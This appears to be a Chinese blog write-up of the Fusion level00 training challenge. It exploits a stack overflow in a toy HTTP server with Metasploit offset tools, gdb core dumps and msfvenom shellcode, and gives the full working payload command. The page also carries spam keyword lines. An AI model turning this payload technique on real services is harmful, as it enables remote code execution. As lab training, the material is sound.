中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Fusion level00

發布時間:2020-07-20 10:56:34 來源:網絡 閱讀:1802 作者:terrying 欄目:安全技術

經過半個多月的時間把Protostar完成了,休息了幾天,繼續做Fusion。

*********題外話開始**********

在大學期間就在糾結是否選擇程序猿的道路,結果因長時間高負荷寫代碼會引發不適而放棄了,不得不贊一下調好一個BUG時那種feel。如今,當完成一道題目也會有這種feel~~~~

*********題外話結束**********

level00源碼:

#include "../common/common.c"
int fix_path(char *path)
{
 char resolved[128];
 if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
 strcpy(path, resolved);
}
char *parse_http_request()
{
 char buffer[1024];
 char *path;
 char *q;
 printf("[debug] buffer is at 0x%08x :-)\n", buffer);
 if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
 if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
 path = &buffer[4];
 q = strchr(path, ' ');
 if(! q) errx(0, "No protocol version specified");
 *q++ = 0;
 if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
 fix_path(path);
 printf("trying to access %s\n", path);
 return path;
}
int main(int argc, char **argv, char **envp)
{
 int fd;
 char *p;
 background_process(NAME, UID, GID);
 fd = serve_forever(PORT);
 set_io(fd);
 parse_http_request();
}

Fusion的題目是Protostar的進階版,難度也更難了,當然,level00還是個熱身題。通過題目提示知道是個Stack問題,而且shellcode應該放在resolved之外。


既然是Stack問題,那就來個長點的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路徑的方法是: #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通過gdb來查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

用pattern_offset.rb工具:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

由此可以得到溢出的字符修改EIP的位置在長度139的位置

接下來需要在輸入中放進shellcode,通過core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


可以得到寫的字符串從0xbf89b3d5開始記錄。同樣,在shellcode前面填充一些0x90。因此得到的payload格式應該是這樣的:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

先獲得一個shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


于是乎:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/




向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

吉安市| 兴仁县| 和林格尔县| 噶尔县| 寿阳县| 苗栗市| 合阳县| 达州市| 南陵县| 绥宁县| 太谷县| 马龙县| 洪湖市| 固阳县| 沈丘县| 东乌珠穆沁旗| 绥滨县| 毕节市| 呼伦贝尔市| 武山县| 巨鹿县| 西峡县| 渭源县| 徐水县| 奈曼旗| 南京市| 崇义县| 曲阳县| 青海省| 云南省| 邵东县| 德阳市| 会昌县| 赞皇县| 隆子县| 长泰县| 新闻| 桑植县| 高碑店市| 阿拉善左旗| 辽源市|